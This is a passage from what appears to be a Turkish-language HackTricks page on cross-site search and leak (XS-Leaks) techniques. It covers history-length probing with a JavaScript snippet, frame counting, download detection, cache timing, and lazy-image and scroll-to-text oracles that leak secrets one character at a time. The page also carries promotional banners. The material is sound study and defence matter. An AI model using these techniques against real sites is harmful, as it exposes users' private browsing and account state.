Eğer bir kullanıcıya çerezler atayabilirseniz, bu saldırıyı yeterli sayıda çerez atayarak da gerçekleştirebilirsiniz (cookie bombası). Bu durumda, doğru yanıtın boyutu arttığında bir hata tetiklenir. Bu durumda, hatayı kontrol etmek için aynı site üzerinden bu isteği tetiklerseniz, <script> otomatik olarak çerezleri gönderir.
Çerez bombası + XS-Search örneği, bu yazının İstenmeyen çözümünde bulunabilir: https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended

Bu tür bir saldırı için genellikle SameSite=None veya aynı bağlamda olmak gereklidir.

URL Maksimum Uzunluğu - İstemci Tarafı

Maksimum Yönlendirmeler

Eğer bir tarayıcının takip edeceği maksimum yönlendirme sayısı 20 ise, bir saldırgan kendi sayfasını 19 yönlendirme ile yüklemeyi deneyebilir ve sonunda kurbanı test edilen sayfaya yönlendirebilir. Eğer bir hata tetiklenirse, o zaman sayfa kurbanı yönlendirmeye çalışıyordu.

Geçmiş Uzunluğu

Geçmiş API'si, JavaScript kodunun tarayıcı geçmişini manipüle etmesine izin verir, bu da bir kullanıcının ziyaret ettiği sayfaları kaydeder. Bir saldırgan, dahil etme yöntemi olarak uzunluk özelliğini kullanabilir: JavaScript ve HTML gezinmesini tespit etmek için.
history.length'i kontrol ederek, bir kullanıcının bir sayfaya gezinmesini sağlayarak, onu aynı kök URL'ye geri değiştirerek ve history.length'in yeni değerini kontrol ederek.

Aynı URL ile Geçmiş Uzunluğu

  • Dahil Etme Yöntemleri: Frames, Pop-uplar
  • Tespit Edilebilir Fark: URL, tahmin edilen URL ile aynı mı
  • Özet: Geçmiş uzunluğunu kötüye kullanarak bir çerçeve/pop-up'ın konumunun belirli bir URL'de olup olmadığını tahmin etmek mümkündür.
  • Kod Örneği: Aşağıda

Bir saldırgan, JavaScript kodunu kullanarak çerçeve/pop-up konumunu tahmin edilen bir URL'ye manipüle edebilir ve hemen about:blank'e değiştirebilir. Eğer geçmiş uzunluğu artarsa, bu URL'nin doğru olduğu ve artma zamanı olduğu anlamına gelir çünkü URL aynıysa yeniden yüklenmez. Eğer artmazsa, o zaman tahmin edilen URL'yi yüklemeye çalıştı ama biz hemen sonra about:blank'i yüklediğimiz için, geçmiş uzunluğu tahmin edilen URL'yi yüklerken hiçbir zaman artmadı.

async function debug(win, url) {
win.location = url + '#aaa';
win.location = 'about:blank';
await new Promise(r => setTimeout(r, 500));
return win.history.length;
}

win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=c"));

win.close();
win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=b"));

Frame Sayımı

iframe veya window.open ile açılan bir web sayfasındaki frame sayısını saymak, kullanıcının o sayfadaki durumunu belirlemeye yardımcı olabilir.
Ayrıca, sayfanın her zaman aynı sayıda frame'e sahip olması durumunda, frame sayısını sürekli olarak kontrol etmek, bilgi sızdırabilecek bir deseni belirlemeye yardımcı olabilir.

Bu tekniğin bir örneği, Chrome'da bir PDF'nin frame sayımı ile tespit edilebilir çünkü dahili olarak bir embed kullanılır. Bu tekniğin ilginç olabileceği zoom, view, page, toolbar gibi bazı içerik üzerinde kontrol sağlayan ık URL Parametreleri bulunmaktadır.

HTMLElements

HTML elemanları aracılığıyla bilgi sızıntısı, özellikle kullanıcı bilgilerine dayalı olarak dinamik medya dosyaları oluşturulduğunda veya medya boyutunu değiştiren filigranlar eklendiğinde web güvenliğinde bir endişe oluşturur. Saldırganlar, belirli HTML elemanları tarafından ortaya çıkarılan bilgilere dayanarak olası durumlar arasında ayrım yapmak için bunu kullanabilir.

HTML Elemanları Tarafından Ortaya Çıkarılan Bilgiler

CSS Özelliği

Web uygulamaları, kullanıcının durumuna bağlı olarak web sitesi stilini değiştirebilir. Çapraz kökenli CSS dosyaları, HTML link elemanı ile saldırgan sayfaya gömülebilir ve kurallar saldırgan sayfaya uygulanır. Bir sayfa bu kuralları dinamik olarak değiştiriyorsa, bir saldırgan kullanıcı durumuna bağlı olarak bu farkları tespit edebilir.
Bir sızıntı tekniği olarak, saldırgan, etkilenen elemanın ve özellik adının bilindiği takdirde, window.getComputedStyle yöntemini kullanarak belirli bir HTML elemanının CSS özelliklerini okuyabilir. Sonuç olarak, bir saldırgan etkilenen elemanın herhangi bir CSS özelliğini okuyabilir.

CSS Geçmişi

{% hint style="info" %} Burada belirtildiğine göre, bu headless Chrome'da çalışmamaktadır. {% endhint %}

CSS :visited seçicisi, kullanıcı tarafından daha önce ziyaret edilen URL'leri farklı şekilde biçimlendirmek için kullanılır. Geçmişte, getComputedStyle() yöntemi bu stil farklarını belirlemek için kullanılabilirdi. Ancak, modern tarayıcılar, bu yöntemin bir bağlantının durumunu ortaya çıkarmasını önlemek için güvenlik önlemleri uygulamıştır. Bu önlemler, her zaman bağlantının ziyaret edilmiş gibi hesaplanmış stilini döndürmek ve :visited seçicisi ile uygulanabilecek stilleri sınırlamak gibi şeyleri içerir.

Bu kısıtlamalara rağmen, bir bağlantının ziyaret edilmiş durumunu dolaylı olarak belirlemek mümkündür. Bir teknik, kullanıcıyı CSS tarafından etkilenen bir alana etkileşimde bulunmaya kandırmakla ilgilidir, özellikle mix-blend-mode özelliğini kullanarak. Bu özellik, öğelerin arka planlarıyla karıştırılmasına izin verir ve kullanıcı etkileşimine bağlı olarak ziyaret edilmiş durumu ortaya çıkarabilir.

Ayrıca, kullanıcı etkileşimi olmaksızın da tespit gerçekleştirilebilir, bağlantıların render süreleri sömürülerek. Tarayıcılar ziyaret edilmiş ve edilmemiş bağlantıları farklı şekilde render edebileceğinden, bu, render süres

ContentDocument X-Frame Sızıntısı

Chrome'da, "X-Frame-Options" başlığı "deny" veya "same-origin" olarak ayarlanmış bir sayfa bir nesne olarak gömülüyorsa, bir hata sayfası görünür. Chrome, bu nesnenin contentDocument özelliği için diğer iframe'ler veya diğer tarayıcılardan farklı olarak boş bir belge nesnesi (null yerine) döndürür. Saldırganlar, boş belgeyi algılayarak, geliştiricilerin X-Frame-Options başlığını tutarsız bir şekilde ayarlaması durumunda (hata sayfalarını genellikle göz ardı ederek), kullanıcının durumu hakkında bilgi ortaya çıkarabilir. Bu tür sızıntıları önlemek için güvenlik başlıklarının farkında olunması ve tutarlı bir şekilde uygulanması önemlidir.

İndirme Algılama

Content-Disposition başlığı, özellikle Content-Disposition: attachment, tarayıcıya içeriği içe aktarmak yerine indirmesini talimat verir. Bu davranış, bir kullanıcının bir dosya indirme tetikleyen bir sayfaya erişiminin olup olmadığını tespit etmek için istismar edilebilir. Chromium tabanlı tarayıcılarda, bu indirme davranışını tespit etmek için birkaç teknik bulunmaktadır:

  1. İndirme Çubuğu İzleme:
  • Chromium tabanlı tarayıcılarda bir dosya indirildiğinde, tarayıcının altında bir indirme çubuğu görünür.
  • Saldırganlar, pencere yüksekliğindeki değişiklikleri izleyerek indirme çubuğunun görünümünü çıkarabilir ve bir indirme başlatıldığını ima edebilir.
  1. Iframe ile İndirme Gezinmesi:
  • Bir sayfa, Content-Disposition: attachment başlığını kullanarak bir dosya indirmesini tetiklediğinde, bir gezinme olayına neden olmaz.
  • İçeriği bir iframe içinde yükleyerek ve gezinme olaylarını izleyerek, içerik düzeninin bir dosya indirmesine neden olup olmadığını kontrol etmek mümkündür (gezinme olmaz).
  1. Iframe Olmadan İndirme Gezinmesi:
  • Iframe tekniğiyle benzer şekilde, bu yöntem bir iframe yerine window.open kullanmayı içerir.
  • Yeni açılan penceredeki gezinme olaylarını izleyerek, bir dosya indirilip indirilmediği (gezinme olmaz) veya içeriğin içe aktarıldığı (gezinme gerçekleşir) ortaya çıkarılabilir.

Yalnızca oturum açmış kullanıcıların böyle indirmeleri tetikleyebildiği senaryolarda, bu teknikler, tarayıcının indirme isteğine verdiği yanıta dayanarak dolaylı olarak kullanıcının kimlik doğrulama durumunu çıkarabilmek için kullanılabilir.

Bölümlenmiş HTTP Önbelleği Atlama

{% hint style="warning" %} Bu teknik neden ilginç: Chrome şimdi önbelleği bölmektedir ve yeni açılan sayfanın önbellek anahtarı şudur: (https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m=xxx), ancak bir ngrok sayfası açarsam ve içinde fetch kullanırsam, önbellek anahtarı şu şekilde olacaktır: (https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx), önbellek anahtarı farklıdır, bu nedenle önbellek paylaşılamaz. Daha fazla ayrıntıyı burada bulabilirsiniz: Önbelleği bölmekle güvenlik ve gizlilik kazanma
(Yorum buradan) {% endhint %}

Eğer bir site example.com, *.example.com/resource kaynağını içeriyorsa, o kaynak, kaynağın doğrudan üst düzey gezinme ile istendiği gibi aynı önbellekleme anahtarına sahip olacaktır. Çünkü önbelleğe erişmek, bir kaynağı yüklemekten daha hızlıdır, bu nedenle bir sayfanın konumunu değiştirmeye ve durduktan 20ms sonra iptal etmeye çalışmak mümkündür. Eğer durduktan sonra köken değiştiyse, kaynağın önbelleklendiği anlamına gelir.
Veya sadece potansiyel olarak önbelleğe alınmış sayfaya bazı fetch istekleri gönderip, alınan zamanı ölçebilirsiniz.

Manuel Yönlendirme

Script Kirliliği

Hizmet İşçileri

Verilen senaryoda saldırgan, "attacker.com" adlı bir alan adında bir hizmet işçisi kaydeder. Ardından, saldırgan hedef web sitesindeki ana belgeden yeni bir pencere açar ve hizmet işçisine bir zamanlayıcı başlatmasını söyler. Yeni pencere yüklenmeye başladığında, saldırgan önceki adımda elde edilen referansı hizmet işçisi tarafından yönetilen bir sayfaya yönlendirir.

Önceki adımda başlatılan isteğin varışında, hizmet işçisi etkin bir şekilde gezinme sürecini sonlandıran bir 204 (İçerik Yok) durum koduyla yanıt verir. Bu noktada, hizmet işçisi önceki adımda başlatılan zamanlayıcıdan bir ölçüm yakalar. Bu ölçüm, gezinme sürecinde gecikmelere neden olan JavaScript'in süresinden etkilenir.

{% hint style="warning" %} Bir yürütme zamanlamasında ağ faktörlerini ortadan kaldırmak ve daha kesin ölçümler elde etmek mümkündür. Örneğin, sayfanın yüklenmeden önce kullandığı kaynakları yükleyerek. {% endhint %}

Fetch Zamanlaması

Çapraz Pencere Zamanlaması


Dünyanın en gelişmiş topluluk araçları tarafından desteklenen ve iş akışlarını otomatikleştirmenize olanak sağlayan Trickest'i kullanın.
Bugün Erişim Alın:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

HTML veya Re Enjeksiyonu ile

Burada, çapraz kaynaklı bir HTML'den bilgi çalmak için HTML içeriği enjekte eden teknikleri bulabilirsiniz. Bu teknikler, herhangi bir nedenle JS kodu enjekte edememeniz durumunda ilginç olabilir.

Sarkan İşaretleme

{% content-ref url="dangling-markup-html-scriptless-injection/" %} dangling-markup-html-scriptless-injection {% endcontent-ref %}

Görüntü Tembel Yükleme

İçeriği çalmak ve gizli bilgiden önce HTML ekleyebiliyorsanız, sarkan işaretleme tekniklerini kontrol etmelisiniz.
Ancak, herhangi bir nedenden dolayı her karakteri ayrı ayrı yapmanız gerekiyorsa (belki iletişim önbellek vuruşuyla gerçekleşiyorsa) bu hileyi kullanabilirsiniz.

HTML'deki görüntülerin bir "yükleme" özniteliği vardır ve değeri "lazy" olabilir. Bu durumda, görüntü yalnızca görüntülendiğinde yüklenir ve sayfa yüklenirken değil:

<img src=/something loading=lazy >

Bu nedenle yapabileceğiniz şey, gizli olanın önüne çok fazla gereksiz karakter eklemek (Örneğin binlerce "W") veya <br><canvas height="1850px"></canvas><br> gibi bir şey eklemektir.
Öyleyse örneğin enjeksiyonumuz bayrağın önünde görünüyorsa, resim yüklenecektir, ancak bayraktan sonra görünüyorsa bayrak + gereksiz karakterler yükleme işlemini engelleyecektir (ne kadar gereksiz karakter yerleştireceğinizle oynamanız gerekecektir). Bu, bu yazıda olan şeydir.

Başka bir seçenek ise, izin veriliyorsa scroll-to-text-fragment kullanmaktır:

Scroll-to-text-fragment

Ancak, botun sayfaya erişmesini sağlarsınız ve bunu şu şekilde yaparsınız:

#:~:text=SECR

Web sayfası şuna benzer olacak: https://victim.com/post.html#:~:text=SECR

Post.html, saldırganın gereksiz karakterlerini ve tembel yükleme resmini içerir ve ardından botun sırrı eklenir.

Bu metin, botun, sayfadaki SECR metnini içeren herhangi bir metne erişmesini sağlar. Bu metin sır olduğu için ve sadece resmin altında olduğu için, resim yalnızca tahmin edilen sır doğruysa yüklenecektir. Böylece, karakter karakter sırrı dışarı sızdırmanızı sağlayacak bir oracle elde edersiniz.

Bunu sömürmek için bazı kod örnekleri: https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e

Gecikmeli Resim Yükleme Zamanına Dayalı Saldırı

Eğer dışarıdan bir resim yüklemek mümkün değilse ve bu, saldırganın resmin yüklendiğini göstermesi gerekiyorsa, başka bir seçenek de karakteri birkaç kez tahmin etmek ve bunu ölçmektir. Eğer resim yüklenirse, tüm istekler yüklenmezse daha uzun sürecektir. Bu, bu çözümde kullanılan şeydir.

{% content-ref url="xs-search/event-loop-blocking-+-lazy-images.md" %} event-loop-blocking-+-lazy-images.md {% endcontent-ref %}

ReDoS

{% content-ref url="regular-expression-denial-of-service-redos.md" %} regular-expression-denial-of-service-redos.md {% endcontent-ref %}

CSS ReDoS

Eğer jQuery(location.hash) kullanılıyorsa, bazı HTML içeriğinin var olup olmadığını zamanlama ile bulmak mümkündür. Bu, main[id='site-main'] seçicisi eşleşmiyorsa, geri kalan seçicileri kontrol etmesine gerek olmadığı için böyledir.

$("*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']")

CSS Enjeksiyonu

{% content-ref url="xs-search/css-injection/" %} css-injection {% endcontent-ref %}

Savunmalar

https://xsinator.com/paper.pdf adresinde önerilen önlemler bulunmaktadır. Ayrıca https://xsleaks.dev/ adresindeki her bölümde de bu tekniklere karşı nasıl korunulacağı hakkında daha fazla bilgi bulabilirsiniz.

Referanslar

AWS hackleme konusunda sıfırdan kahraman olmak için htARTE (HackTricks AWS Red Team Expert)'ı öğrenin!

HackTricks'i desteklemenin diğer yolları:


Dünyanın en gelişmiş topluluk araçları tarafından desteklenen iş akışlarını kolayca oluşturup otomatikleştirmek için Trickest'i kullanın.
Bugün Erişim Alın:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}